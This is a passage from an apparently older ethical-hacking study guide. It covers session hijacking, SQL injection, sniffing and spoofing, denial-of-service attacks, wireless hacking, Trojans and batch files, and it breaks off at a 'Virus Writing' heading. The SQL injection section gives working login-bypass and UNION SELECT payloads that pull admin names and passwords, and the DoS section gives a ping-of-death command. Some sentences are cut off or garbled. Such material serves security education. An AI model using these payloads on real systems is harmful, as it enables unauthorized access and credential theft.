sniffing, to capture the authentication between a client and server, to hijacking the established

session to trick the server into thinking it has a legitimate session with the server.

Session Hijacking Steps

To successfully hijack a session, several items must come into place.

The attacker must be able to track and intercept the traffic

The attacker must be able to desynchronize the connection

The attacker must be able to inject his traffic in place of the victim‘s

If successful, the attacker can then simply sit back and observe or actively take over the

connection.

Passive Session Hijacking – The process of silently sniffing the data exchange between the user

and server.

Active Session Hijacking – The process of killing the victim‘s connection and hijacking it for

malicious intent.

TCP Concepts

To understand hijacking, you must know how TCP functions. As TCP is a reliable service, a 3-

step startup is performed before data is transported.

TCP 3-step startup

Before two computers can communicate, TCP must set up the session. This setup is comprised of

three steps. Once these three steps are completed, the two computers can exchange data. The 3-

step startup is shown below:

Client -- SYN - Server

Client - SYN / ACK -- Server

Client -- ACK - Server

Sequence Numbers

During the first two steps of the three-step startup, the two computers that are going to

communicate exchange sequence numbers. These numbers enable each computer to keep track of

how much information has been sent and the order in which the packets must be reassembled. An

attacker must successfully guess the sequence number to hijack the session.

Session Hijacking Tools

There are many tools available to hijack a session. Some of these tools include:

Juggernaut

Hunt

SolarWinds

TCP Session Reset Utility

Session Hijacking Countermeasures

Session hijacking is not one of the easiest attacks for an attacker to complete. It can, however,

have disastrous results for the victim if successful. Organizations should consider replacing clear

text protocols, such as FTP and Telnet, with more secure protocols such as SSH. Also,

administrative controls such as time stamps, sequence numbers, and digital signatures can be

used to prevent anti-replay attacks.

SQL Injection

Some organizations are so focused on their web servers, that they may never realize that the

attacker may have another target in mind. The organization‘s most valuable assets are not on the

web server, but contained within the company‘s database. This juicy target can contain customer

data, credit card numbers, passwords, or other corporate secrets. Attackers search for and exploit

databases that are susceptible to SQL injection. SQL injection occurs when an attacker is able

to insert SQL statements into a query by means of a SQL injection vulnerability.

SQL injection as the name suggest is a type of security attack in which the attacker (injects) inputs

specially crafted Structured Query Language (SQL) code through a web browser to gain access

to resources, or make changes the data. It is a technique of injecting SQL commands to exploit

non-validated input loopholes in a web application database. Programmers use sequential

commands with user input, making it easier for attackers to inject commands at a very fast speed

and accuracy. It also takes advantage of unsafe queries in web applications and builds dynamic

SQL queries.

SQL Insertion Discovery

Attackers typically scan for port 1433 to find Microsoft SQL databases. Once identified, the

attacker will place a single ‗inside a username field to test for SQL vulnerabilities. The attacker

will look for a return result similar to the one shown below:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ‗ and Password=''./login.asp, line 42

This informs the attacker that SQL injection is possible. At this point, the attacker can shut down

the server, execute commands, extract the database, or do just about anything else he wants to

do.

SQL Injection Vulnerabilities

SQL servers are vulnerable because of poor coding practices, lack of input validation, and the

failure to update and patch the service. The two primary vulnerabilities are:

Unpatched Systems

Blank sa Password

Steps for performing SQL Injection

Now the most common question that arises in the mind is what tool would one require to take out a

SQL Attack. And the answer is quite simple :

Any web browser would be good enough for a SQL attack.

How to do a SQL attack?

First of all we should look for pages that allow user to submit data, like login page, search page,

feedback, etc. If we have a HTML page we should check the source code for whether it is using

POST or GET, look for the <Form> tag in the source code

<Form action=search.asp method=post>

<input type=hidden name=X value=Z>

</Form>

If not, check for pages like ASP, JSP, CGI, or PHP

Example:

Check the URL that takes the following parameters:

http:// www.xsecurity.com /index.asp?id=10

In the above example, attackers might attempt:

http://www.xsecurity.com/index.asp?id=blah‘ or 1=1—

SQL Injection Techniques

In SQL Injection, the hacker uses SQL queries and creativity to get to the database of sensitive

corporate data through the web application. SQL or Structured Query Language is the computer

language that allows you to store, manipulate, and retrieve data stored in a relational database

(or a collection of tables which organize and structure data). SQL is, in fact, the only way that a

web application (and users) can interact with the database. Examples of relational databases

include Oracle, Microsoft Access, MS SQL Server, MySQL, and Filemaker Pro, all of which

use SQL as their basic building blocks.

SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is

as ominous as it sounds and in fact will eliminate the table with a particular name.

In the legitimate scenario of the login page example above, the SQL commands planned for the

web application may look like the following:

SELECT count(*)

FROM users_list_table

WHERE username=‘FIELD_USERNAME‘

AND password=‘FIELD_PASSWORD‖

In plain English, this SQL command (from the web application) instructs the database to match the

username and password input by the legitimate user to the combination it has already stored. Each

type of web application is hard coded with specific SQL queries that it will execute when

performing its legitimate functions and communicating with the database. If any input field of the

web application is not properly sanitized, a hacker may inject additional SQL commands that

broaden the range of SQL commands the web application will execute, thus going beyond the

original intended design and function. A hacker will thus have a clear channel of communication

(or, in layman terms, a tunnel) to the database irrespective of all the intrusion detection systems and

network security equipment installed before the physical database server. To test a site for SQL

attack. Use a single quote in the input:

blah‘ or 1=1—

Login:blah‘ or 1=1—blah 1 1

Password:blah‘ or 1=1—

The next big thing is :How to retrieve data any DataTo get the login_name from the―admin

login‖ table

http:// xsecurity.com /index.asp?id=10 UNION SELECT TOP 1 login_name FROM

admin_login--

From above, you get login_name of the admin_user. To get the password for login name=―yuri‖

http‖// xsecurity.com /index.asp?id=10 UNION SELECT TOP 1 password FROM

admin_login where login_name=‗yuri‘--

Tools for SQL Injection

Wpoison

Pearlscript

SQLDict

SqlExec

SQLbf

SQLSmack

SQL2.exe

AppDetective

Database Scanner

SQLPoke

NGSSQuirreL

SQLPing v2.2

Preventing SQL Injection

Preventing SQL injection is best achieved through the techniques discussed above. You should

also make sure that the application is running with only enough rights to do its job and implements

error handling, so that when the system detects an error, it will not provide the attacker with any

useable information.

SQL Injection in Oracle

UNIONS can be added to the existing statement to execute a second statement

SUBSELECTS can be added to existing statements

Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string

INSERTS, UPDATES, and DELETES can also be injected

Anonymous PL/SQL block in procedures

SQL Injection in MySql

It is not easy to perform SQL injection in a MySql database. While coding with a MySql

application, the injection vulnerability is not exploited. It is difficult to trace the output. You can

see an error because the value retrieved is passed on to multiple queries with different numbers of

columns before the script ends.In such situations, SELECT and UNION commands cannot be

used.

8. NETWORK ATTACKS

Sniffers

A sniffer or packet analyzer can be software or hardware based. Its function is to capture and

decode network traffic. Sniffers typically place the NIC into promiscuous mode. Captured

traffic can be analyzed to determine problems in a network such as bottlenecks or performance

degradation. Sniffers can also be used by an attacker or unauthorized individual to capture clear

text passwords and data from the network. Protocols such as FTP, Telnet, and HTTP are

especially vulnerable as they pass all usernames and passwords in clear text.

Passive Sniffing

Passive sniffing is made possible through the use of hubs. As hubs treat all ports as one giant

collision domain, all traffic is visible. Unfortunately for the attacker, most modern networks no

longer use hubs. This makes the capture of unauthorized traffic more difficult. That is unless the

attacker is sniffing a wireless network as it acts as a hub, not a switch.

Active Sniffing

Switches do not operate like hubs. By default, they make each physical port a separate collision

domain. Therefore, active sniffing requires that the switch be manipulated in some fashion. The

objective is to force the switch to pass the attacker the needed traffic. Otherwise, the attacker

will only see the traffic bound for his particular port or broadcast traffic, which by default, is

passed to all ports.

Generic Sniffing Tools

These tools allow you to view real-time packet captures and configure filters for pre/post filtering.

Once the data is captured, these programs allow you to interactively view each packet and its

individual headers. Descriptions of the packet headers are summarized. Most will also allow you

to reconstruct individual TCP streams. Some of these programs are freely available, while others

are quite expensive.

WinDump – A Windows based command line TCPDump program

TCPDump – The most well-known Unix based sniffing program

Ethereal – A great GUI TCP/IP sniffer. It is free and available at

http://www.ethereal.com

EtherPeek – A commercial grade sniffer developed by WildPackets

Specialized Sniffing Tools

Unlike the generic tools listed above, these tools capture specific types of traffic. These are

optimized for hacking and penetration testing as all the non-essential information has been

removed.

DSniff – Captures clear text usernames and passwords.

Mailsnarf - Optimized to capture clear text mail information.

URLsnarf – Builds a list of all browsed URLS.

Webspy – Opens the URL the victim is browsing on the attacker‘s computer

Cain – Sniff traffic, capture/crack passwords, and enumerate Windows networks.

Ettercap – multipurpose sniffer/interceptor/logger for switched LAN‘s.

Overcoming Switched Networks

Sniffing traffic on a switched network can be accomplished through one of two ways: Flooding or

ARP Spoofing.

Flooding

Flooding is simply the process of sending the switch more MAC addresses than the CAM

(Content Addressable Memory) can hold. Some, but not all switches that are flooded with such a

high amount of traffic will default open. Simply stated, these devices will begin to function as a

hub passing all traffic to all ports. One of the programs an attacker may use to attempt to

accomplish this technique is EtherFlood.

ARP Spoofing

This technique corrupts the ARP protocol to attempt the redirection of switched traffic. Normally,

ARP is used to resolve known IP addresses to unknown MAC addresses. Once the ARP

protocol has performed this resolution, the results are stored in the ARP cache. It is stored there

for a short period of time to speed consequent communications and reduce broadcast traffic. Since

ARP is a trusting protocol, a victim‘s computer will accept an unsolicited ARP response. This

unsolicited ARP response can be used to fool the victim‘s computer into communicating with the

wrong device. For the attacker to be successful, he must also fool the switch and enable IP

forwarding to move the data from his computer, to its true destination. At this point, he will have

successfully placed himself in the traffic stream and can capture all forthcoming data

transmissions. Several programs are available that can accomplish this attack. One such program

is

MAC Spoofing

MAC spoofing tools allow the attacker to pretend to be another physical device. This type of

attack may be used in situations where switch ports are locked by MAC address. These tools are

available for Windows and Linux. Some can even be used to spoof wireless network cards.

Macof – Floods the network with random MAC addresses

SMAC – Windows MAC address spoofing tool

MAC Changer – Linux MAC address spoofing tool

DNS Spoofing

DNS spoofing is a hacking technique used to inject DNS servers with false information. It enables

malicious users, redirects users to bogus websites, or can be used for denial of service attacks. A

good understanding of DNS and zone files are required to pass the CEH exam. Zone files contain

SOA, NS, A, CNAME, and MX records. Other DNS record types include: PTR, HINFO, and

MINFO. The two basic approaches to DNS spoofing are:

Hijack the DNS query and redirect the victim to a bogus site

Hack the DNS server, thereby, forcing it to provide a false response to a DNS query

Two of the tools available to the attacker to perform DNS spoofing are:

WinDNSSpoof

Distributed DNS Flooder

Detecting Sniffers and Monitoring Traffic

It is not easy to detect sniffers on the network. Organizations should make sure their policies

disallow unauthorized sniffers. There should also be a heavy penalty placed on those found to be

in violation of such policies. There are some tools that can aid the network security administrator

in maintaining compliance to this policy, such as, SniffDet, IRIS and NetIntercept.

Denial of Service (DOS)

A DoS attack is any type of attack that brings a system offline or otherwise makes a host's service

unavailable to legitimate users. Early DoS attacks were often described as annoying, frustrating,

or a nuisance. Modern DoS attacks have increased in sophistication and can render a network

unusable. These attacks can cost corporations money through lost sales and profits. While it may

be difficult to place an exact monetary figure on DoS attacks, they are costly.

DOS Attacks or Denial Of Services Attack have become very common amongst Hackers who use

them as a path to fame and respect in the underground groups of the Internet. Denial of Service

Attacks basically means denying valid Internet and Network users from using the services of

the target network or server. It basically means, launching an attack, which will temporarily

make the services, offered by the Network unusable by legitimate users. In others words one can

describe a DOS attack, saying that a DOS attack is one in which you clog up so much memory on

the target system that it cannot serve legitimate users. Or you send the target system data

packets, which cannot be handled by it and thus causes it to either crash, reboot or more

commonly deny services to legitimate users.

Common DoS Attacks

Popular DoS attacks can be separated into three categories:

Bandwidth

Protocol

Logic

Common DoS Attack Strategies

No matter the type, the end result is the same, loss of service for the legitimate users. Some of the

more common DoS attack strategies are: Ping of Death, SSPing, Land, Smurf, SYN Flood, Win

Nuke, Jolt2, Bubonic, Targa, and Teardrop.

Common DDoS(Distributed DoS) Attacks

DDoS software has matured beyond the point where it can only be used by the advanced attacker.

The most powerful DDoS programs are open source code. While these programs reside in the

virtual space of the Internet, programmers tweak them, improve them, and add features to each

successive iteration. Some common DdoS Attack strategies are:

Trin00 1, TFN, TFN2K, Stacheldraht, Shaft and Mstream.

DDoS Attack Sequence

DDoS attacks follow a two-prong attack sequence:

Mass Intrusion

Attack Phase

DOS Attacks are of the following different types-:

Those that exploit vulnerabilities in the TCP/IP protocols suite.

Those that exploit vulnerabilities in the Ipv4 implementation.

There are also some brute force attacks, which try to use up all resources of the target

system and make the services unusable.

Some common vulnerabilities in TCP/IP are Ping of Death, Teardrop, SYN attacks and Land

Attacks.

Ping of Death

This vulnerability is quite well known and was earlier commonly used to hang remote systems (or

even force them to reboot) so that no users can use its services. This exploit no longer works, as

almost all system administrators would have upgraded their systems making them safe from such

attacks. In this attack, the target system is pinged with a data packet that exceeds the maximum

bytes allowed by TCP/IP, which is 65 536. This would have almost always caused the remote

system to hang, reboot or crash. This DOS attack could be carried out even through the command

line, in the following manner:

The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the

victim's computer:

C:\windows>ping -l 65540

Teardrop

The Teardrop attack exploits the vulnerability present in the reassembling of data packets.

Whenever data is being sent over the Internet, it is broken down into smaller fragments at the

source system and put together at the destination system. Say you need to send 4000 bytes of data

from one system to the other, then not all of the 4000 bytes is sent at one go. This entire chunk of

data is first broken down into smaller parts and divided into a number of packets, with each packet

carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets,

then:

The first Packet will carry data from 1 byte to 1500 bytes

The second Packet will carry data from 1501 bytes to 3000 bytes

The third packet will carry data from 3001 bytes to 4000 bytes

These packets have an OFFSET field in their TCP header part. This Offset field specifies from

which byte to which byte does that particular data packet carries data or the range of data that

it is carrying. This along with the sequence

numbers helps the destination system to reassemble the data packets in the correct order. Now in

this attack, a series of data packets are sent to the target system with overlapping Offset field

values. As a result, the target system is not able to reassemble the packets and is forced to crash,

hang or reboot.

Say for example, consider the following scenario-: (Note: _ _ _ = 1 Data Packet)

Normally a system receives data packets in the following form, with no overlapping Offset values.

_ _ _ _ _ _ _ _ _

(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)

Now in a Teardrop attack, the data packets are sent to the target computer in the following format:

_ _ _ _ _ _ _ _ _

(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)

When the target system receives something like the above, it simply cannot handle it and will crash

or hang or reboot.

SYN Attack

The SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how

SYN Attacks work, you need to first know how TCP/IP establishes a connection between two

systems. Whenever a client wants to establish a connection with a host, then three steps take place.

These three steps are referred to as the three-way handshake.

In a normal three way handshake, what happens is that, the client sends a SYN packet to the

host, the host replies to this packet with a SYN ACK packet. Then the client responds with a

ACK (Acknowledgement) packet. This will be clearer after the following depiction of these

steps-:

1. Client --------SYN Packet--------------‡Host

In the first step the client sends a SYN packet to the host, with whom it wants to establish a three-

way connection. The SYN packet requests the remote system for a connection. It also contains the

Initial Sequence Number or ISN of the client, which is needed by the host to put back the

fragmented data in the correct sequence.

2. Host -------------SYN/ACK Packet----------‡Client

In the second step, the host replies to the client with a SYN/ACK packet. This packet

acknowledges the SYN packet sent by the client and sends the client its own ISN.

3. Client --------------ACK-----------------------‡Host

In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a

ACK packet. These three steps together are known as the 3-way handshake and only when they are

completed is a complete TCP/IP connection established.

In a SYN attack, several SYN packets are sent to the server but all these SYN packets have a bad

source IP Address. When the target system receives these SYN Packets with Bad IP Addresses, it

tries to respond to each one of the with a SYN ACK packet. Now the target system waits for an

ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the

target system never actually receives the ACK packet. It thus queues up all these requests until it

receives an ACK message. The requests are not removed unless and until, the remote target system

gets an ACK message. Hence these requests take up or occupy valuable resources of the target

machine. To actually affect the target system, a large number of SYN bad IP packets have to be

sent. As these packets have a Bad Source IP, they queue up, use up resources and memory or the

target system and eventually crash, hang or reboot the system.

Land Attacks

A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP

Address, the IP address of the target system itself is used. This creates an infinite loop

between the target system and the target system itself. However, almost all systems have filters

or firewalls against such attacks.

Smurf Attacks

A Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests

are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses

from within the target network. As and when the router gets a PING message, it will route it or

echo it back, in turn flooding the Network with Packets, and jamming the traffic. If there are a large

number of nodes, hosts etc in the Network, then it can easily clog the entire network and prevent

any use of the services provided by it. Read more about the Smurf Attacks at CERT:

http://www.cert.org/advisories/CA-98.01.smurf.html

UDP Flooding

This kind of flooding is done against two target systems and can be used to stop the services

offered by any of the two systems. Both of the target systems are connected to each other, one

generating a series of characters for each packet received or in other words, requesting UDP

character generating service while the other system, echoes all characters it receives. This creates

an infinite non-stopping loop between the two systems, making them useless for any data

exchange or service provision.

Distributed DOS Attacks

DOS attacks are not new; in fact they have been around for a long time. However there has been a

recent wave of Distributed Denial of Services attacks which pose a great threat to Security

and are on the verge of overtaking Viruses/Trojans to become the deadliest threat to Internet

Security. Now you see, in almost all of the above TCP/IP vulnerabilities, which are being

exploited by hackers, there is a huge chance of the target's system administrator or the authorities

tracing the attacks and getting hold of the attacker. Now what is commonly being done is, say a

group of 5 Hackers join and decide to bring a Fortune 500 company's server down. Now each one

of them breaks into a smaller less protected network and takes over it. So now they have 5

networks and supposing there are around 20 systems in each network, it gives these Hackers,

around 100 systems in all to attack from. So they sitting on there home computer, connect to the

hacked less protected Network, install a Denial of Service Tool on these hacked networks and

using these hacked systems in the various networks launch Attacks on the actual Fortune 500

Company. This makes the hackers less easy to detect and helps them to do what they wanted to do

without getting caught. As they have full control over the smaller less protected network they can

easily remove all traces before the authorities get there. Not even a single system connected to the

Internet is safe from such DDOS attacks. All platforms including UNIX, Windows NT are

vulnerable to such attacks. Even MacOS has not been spared, as some of them are being used

to conduct such DDOS attacks.

Preventing DoS Attacks

No solution provides complete protection against the threat of DoS attacks. However, there are

things you can do to minimize the effect of a DoS attack. These include:

Practice the principle of Least Privilege

Limit bandwidth

Configure aggressive ingress and egress filtering

Keep computers up to date and patched

Implement load balancing

Implement IDS

DoS Scanning Tools

If you believe that your computer may have been compromised, the best practice is to use a

scanning tool to check for DoS infestation. There are several tools to help with this task. Some of

these include: Find_ddos, SARA, DdoSPing, RID and Zombie Zapper.

9. WIRELESS HACKING

Introduction –Wireless Networking

Wireless networking technology is becoming increasingly popular and at the same time has

introduced several security issues.

The popularity of wireless technology is driven by two primary

Convenience

Cost

A wireless local area network (WLAN) allows workers to access digital resources without being

locked to their desks.

Laptops can be carried into meetings or even in to a star bucks café tapping in to a wireless

network. this convenience has become affordable.

Business and Wireless Attacks

Business is at high risk from wireless hackers who don‘t need any physical entry into the

business network to hack. but can easily compromise the network with the help of freely

available tools.

War driving, war chalking, warflying are some of the ways that a wireless hacker can

access the vulnerability of the firms network.

Components of a Wireless Network

Wi-Fi Radio devices

Access points

Gateways

Types of Wireless Network

Four basic types

Peer to peer

Extension to a wired network

Multiple access points

LAN to LAN Wireless network

Setting up WLAN

When setting up a WLAN, the channel and service set identifier (SSID) must be

configured in addition to traditional network setting such as IP address and a subnet

mask.

The channel is a number between 1 and 11 and designates the frequency on which the

network will operate.

The SSID is an alphanumeric string that differentiates networks operating on the same

channel.

It is essentially a configurable name that identifies and individual network. These setting

are important factors when identifying WLANs and sniffing traffic.

SSID (Service Set Identifier)

The SSID is a unique identifier that wireless networking devices use to establish and maintain

wireless connectivity.

SSIDs act as a single shared password between access points and clients.

Security concerns arise when the default values are not changed. As these units can be

easily compromised.

What is Wired Equivalent Privacy (WEP)

WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to

provide for confidentiality of date on wireless networks at a level equivalent to that

Of wired LANs.

Wired LANs typically employ physical controls to prevent unauthorized users from

Connecting to the network and viewing data. In a wireless LAN can be access without

Physically connecting to the LAN.

IEEE choose to employ encryption at the data link layer to prevent unauthorized

Eavesdropping on a network .this is accomplished by encrypting data with the RC4

Encryption algorithm.

Denial-of-Service attacks

Wireless LANs are susceptible to the same protocol based attacks that plague wired

WLANs send information via radio waves on public frequencies, thus they are

susceptible to inadvertent interference from traffic from the same radio band.

Various types of Dos attacks:

-Physical layer

-Data- link layer

-Network layer

Man-In-The-Middle-Attack (MITM)

Eavesdropping -Happens when an attacker receives a data communication stream.

-Not using security mechanism such as IPsec, SSH or SSL makes the data vulnerable to

an

Unauthorized user.

Manipulation -an extended step of eavesdropping.

-can be done ARP Poisoning.

Hacking Wireless Networks

Wireless networking technologies become more popular each day. The reasons are simple;

wireless networks are easy to configure, easy to use, require no cabling and are inexpensive.

802.11 Standards

The IEEE 802.11 committee sets the standards for the wireless protocol. The three wireless

standards include:

802.11 a – Speeds up to 54 Mbps

802.11 b – Speeds up to 11 Mbps

802.11 g – Speeds up to 54 Mbps

WEP

WEP (Wired Equivalent Privacy) was originally designed to protect wireless networks from

eavesdropping through the use of a 40-bit key. The key was limited to 40 bits, due to export rules

that existed during the late 1990s when the 802.11 protocol was developed. This provides a very

limited level of encryption that is relatively easy to compromise. WEP is vulnerable because it uses

a relatively short IV (Initialization Vector) and key remains static. Luckily, there are protection

mechanisms that make wireless more secure. These include:

WPA – Wireless Protection Access, a replacement for WEP

LEAP – Cisco's Lightweight Extensible Authentication Protocol

PEAP – Protected Extensible Authentication Protocol

Finding WLANs

Finding unsecured wireless networks has become quite a fad; some criminal hackers are making a

game of driving around and connecting to as many networks as they can. One of the most well-

known tools for finding WLANs is NetStumbler.

Cracking WEP Keys

Because of the weaknesses of WEP, locked networks can be accessed as long as enough packets

can be captured. Two tools used to break into WEP secured networks are AirSnort and WEP

Crack.

Sniffing Traffic

Just as in the wired world, there are tools that can be used to capture and sniff wireless traffic.

They include AiroPeek and Kismet.

Wireless Attacks

Wireless networks can be attacked by several different methods. The two most common are:

Wireless Dos and Access Point Spoofing.

Securing Wireless Networks

Fortunately, there are ways to secure wireless networks. A good starting point is to turn on WEP

and change the SSID(Service Set Identifier). Changing the SSID and enabling WEP is only the

first step, since it is still transmitted in clear text. You should continue by carefully considering the

placement of your WAPs and restricting the allocation of DHCP addresses on the wireless network

segment. Other considerations include:

Prohibit access from unknown MAC addresses

Use Strong Authentication such as RADIUS

Consider IPSec

Build a network that maintains defense in depth

10. TROJANS & BACKDOORS

Trojan horses are programs that are malicious in nature but are disguised as benign. Once

executed, they plant unwanted malicious code on the user‘s computer. These programs can, among

other things, steal passwords, provide remote access, log keystroke activity, or destroy data.

Trojans are nothing but remote administration tools (RATs) that provide attackers with remote

control and remote access to the victim system. in other words, once a system has been infected

with a Trojan, an attacker can remotely control almost all hardware and software on it. Modern day

Trojans have come extremely advanced and provide attackers with a variety of different

sophisticated features for remote control. Once a Trojan has been installed on a system then not

only is all its data under threat, but also there is a high possibility wherein the compromised system

may be misused to initiate an attack on some third- party system.

Trojans are clearly extremely dangerous tools that are capable of doing a lot of harm to the victim

system. Some of the most common malicious activities that can be conducted with the help of

Trojans are as follows:

Trojans are most commonly used by attackers to steal sensitive IP data from the

victim corporations.

A number of Trojans have inbuilt logging capabilities.

Almost all Trojans can also be used for purely malicious purpose.

Attackers often use Trojans to exploit the resources of your system (and network) to

execute attack on pre-defined victim systems.

What is a Trojan Horse?

The story of the Trojan Horse comes from the classic novel, The Iliad, where the Trojans placed

the gift of a tall wooden horse at the city gates. The city inhabitants accepted the gift and moved it

inside. Then, during the middle of the night, soldiers who were hiding inside the horse slipped out

and attacked the city‘s inhabitants. Trojan programs, just as with the historical version, require

the user to accept the malicious gift. Once executed, the system is infected. Therefore, the best

defense is to make sure users are trained not to download or install unsolicited applications.

Working

The working of Trojans is quite easy to understand and using them requires almost no technical

knowledge. Most Trojans are made up of the two main parts:

1. The Server part: it has installed on the victim‘s system through trickery or disguise.

2. The Client part: it is installed on the attacker‘s system and is then used to connect to

the server part of the Trojan installed on the victim‘s system.

An attacker can carry out a Trojan attack on the target system by following the simple given

steps:

1. The first step of an attacker‘s is to find a way to install the server part of the Trojan

on the target system. This is probably one of the difficult steps in Trojan attack. Some

of most common ways which one can do this is as follows:

Email

Autorun CD-ROMs

Instant Messengers

Physical access

EXE Binders

2. Once the server part of the Trojan is installed on the victim‘s system, it then binds

itself to a particular port on the target system and listens for connections. Each Trojan

listens for connections on a pre-defined specific port number. For example, the

Netbus Trojan listens for connections on the predefined port 12345.

3. Next the attacker needs to somehow find out IP address of the target system on which

the server part of the Trojan has been installed.

4. Finally, the attacker uses the client part of the Trojan tool (installed on his system) to

connect to the server part installed on the target system.

5. On most occasions, after compromising the target system with a Trojan, attackers

install a backdoor on it. So that the next time they want access to the same system, the

above cumbersome process need not be executed all over again.

Common Trojans and Backdoors

The most common Trojans, allow the attacker remote access to the victim's computer. Various

means are used to trick the user into installing the program. Once installed, the attacker can use the

Trojan to have complete access to that computer, just as if he were physically sitting in front of its

keyboard. Common ways Trojans are acquired include e-mail attachments, untrusted sites, peer-to-

peer programs (i.e., Kazaa), or Instant Messenger downloads. Several of the most well-known

Trojans are: BackOrifice 2000, QAZ, Tini, Donald Dick, SubSeven, NetBus, Beast and Netcat.

Wrappers

Wrappers are programs that are used to combine Trojan programs with legitimate programs.

This combined, wrapped executable is then forwarded to the victim. The victim sees only the one,

legitimate program and upon installation, is tricked into installing the Trojan. Not all of these

programs will give the attacker the icon he needs to trick the victim into executing the program.

So, tools such as Michelangelo or IconPlus will be used to alter the installation icon. It can be

made to look like anything from a Microsoft Office 2000 icon, to a setup icon for the latest

computer game.

Covert Channels

Covert channels rely on the principle that you cannot deny what you must permit. Therefore, if

protocols such as HTTP, ICMP, and DNS are allowed through the firewall, these malicious

programs will utilize those openings. Three of the top covert channel programs are listed below:

ACK CMD - Uses TCP ACK‘s as a covert channel

Loki – Uses ICMP as a covert channel

Reverse WWW Shell – Uses HTTP as a covert channel

Backdoor Countermeasures

The cheapest countermeasure to implement is that of educating users not to download and install

applications from e-mail or the Internet. Anti-virus software must also be installed and kept

current. Outdated anti-virus software is of little to no value. If you suspect a computer has become

infected with a Trojan or backdoor:

use a port-monitoring tool to investigate running processes and applications and,

install a cleaner to remove the malicious software.

Port Monitoring Tools

The tools listed below are one quick and simple way to investigate the programs and processes

running on a computer. Even without the add-on tools listed below, you can still get a good look at

running processes and applications by using the GUI Task Manager. Another built-in port activity

tool that is command line based is Netstat. Fortunately, there are lots of good port monitoring tools

available to monitor programs and processes. Several of these are: Fport, TCPView, Process

Viewer and Inzider.

System File Verification

Whenever Trojans are discovered, you will need to thoroughly investigate the amount of damage

that has been done. Remember that the three basic tenets of security are confidentiality, integrity,

and availability. One or more of these most likely has been violated. If you are no longer sure of

the integrity of the file system, you will be required to reinstall from a known, good backup media.

There are other ways to verify the integrity of the system. These include: WFP (Windows File

Protection), MD5SUM and TripWire.

11. BATCH PROGRAMMING & VIRUS CODING

Viruses

A computer virus is nothing more than a malicious program that is capable of duplicating itself

solely for the purpose of causing damage. Viruses do not spontaneously execute on one‘s

computer; they must be given control via an overt act, such as clicking on an executable file

attached to an email message; or via an implicit permission that allows your software (IE for

example) to automatically execute certain kinds of programs (or scripts). Typically, when a virus

gets control it copies itself into other files on one‘s system and then tries to hitch a ride via email or

other network-based means to other computers. Viruses can only spread by infecting other

objects like programs, files, documents, or e-mail attachments. If a virus fails to infect a file or

program, it cannot spread. Some well-known viruses that have destroyed data and infected

computer systems include: Cherobyl, ExploreZip, I Love You and Melissa.

Unlike a virus, a worm is a self-propagating program. Worms copy themselves from one

computer to another, often without the user‘s knowledge. Some well-known worms that have

destroyed data and infected computer systems include: Pretty Park Worm, Code Red Worm,

W32/Klex Worm, BugBear Worm, W32/Opas erv Worm, SQL Slammer Worm, Code Red

Worm, MS Blaster and Nimda Worm.

Batch Programming

Batch file programming is nothing but the Windows version of Unix Shell programming. Let's

start by understanding what happens when we give a DOS command. DOS is basically a file

called command.com. It is this file (command.com) which handles all DOS commands that you

give at the DOS prompt---such as COPY, DIR, DEL etc. These commands are built in with the

Command.com file. (Such commands which are built in are called internal commands).DOS

has something called external commands too such as FORMAT, UNDELETE, BACKUP etc.

So whenever we give a DOS command either internal or external, command.com either

straightaway executes the command (Internal Commands) or calls an external separate

program which executes the command for it and returns the result (External Commands).

Why do we need Batch File Programs?

Say you need to execute a set of commands over and over again to perform a routine task like

Backing up Important Files, Deleting temporary files(*.tmp, .bak , ~.* etc) then it is very difficult

to type the same set of commands over and over again. To perform a bulk set of same commands

over and over again, Batch files are used. Batch Files are to DOS what Macros are to Microsoft

Office and are used to perform an automated predefined set of tasks over and over again.

How to create batch files?

Batch files are basically plain text files containing DOS commands. So the best editor to write your

commands in would be Notepad or the DOS Editor (EDIT) All you need to remember is that a

batch file should have the extension .BAT(dot bat)Executing a batch file is quite simple too. For

example if you create a Batch file and save it with the filename batch.bat then all you need to

execute the batch file is to type:

C:\windows>batch.bat

What happens when you give a Batch file to the command.com to execute?

Whenever command.com comes across a batch file program, it goes into batch mode. In the batch

mode, it reads the commands from the batch file line by line. So basically what happens is,

command.com opens the batch file and reads the first line, then it closes the batch file. It then

executes the command and again reopens the batch file and reads the next line from it. Batch files

are treated as Internal DOS commands.

Note

While creating a batch file, one thing that you need to keep in mind is that the filename of the batch

file should not use the same name as a DOS command. For example, if you create a batch file by

the name dir.bat and then try to execute it at the prompt, nothing will happen. This is because when

command.com comes across a command, it first checks to see if it is an internal command. If it is

not then command.com checks if it a .COM, .EXE or .BAT file with a matching filename. All

external DOS commands use either a .COM or a .EXE extension, DOS never bothers to check if

the batch program exits.

First take up a simple batch file which executes or launches a .EXE program. Simply type the

following in a blank text file and save it with a .BAT extension.

C: cd windows telnet Now let's analyze the code, the first line tells command.com to go to the C: Next it tells it to change

the current directory to Windows. The last line tells it to launch the telnet client. You may

contradict saying that the full filename is telnet.exe. Yes you are right, but the .exe extension is

automatically added by command.com. Normally we do not need to change the drive and the

directory as the Windows directory is the default DOS folder. So instead the bath file could simply

contain

the below and would still work.

Launch command.com (DOS) and execute the batch file by typing:

C:\WINDOWS>batch_file_name

You would get the following result:

C:\WINDOWS>scandisk

And Scandisk is launched. So now the you know the basic functioning of Batch files.

Let's move on to Batch file commands

The REM Command-

The simplest basic Batch file command is the REM or the Remark command. It is used

extensively by programmers to insert comments into their code to make it more readable

and understandable. This command ignores anything there is on that line. Anything on

the line after REM is not even displayed on the screen during execution. ECHO: The Batch Printing Tool-

The ECHO command is used for what the Print command is in other programming

languages: To Display something on the screen. It can be used to tell the user what the

bath file is currently doing.

We can prevent a particular command from being shown but still be executed by

preceding the command with a @ sign.

The EXIT command- Ends your batch file.

Virus Writing

Types of Viruses

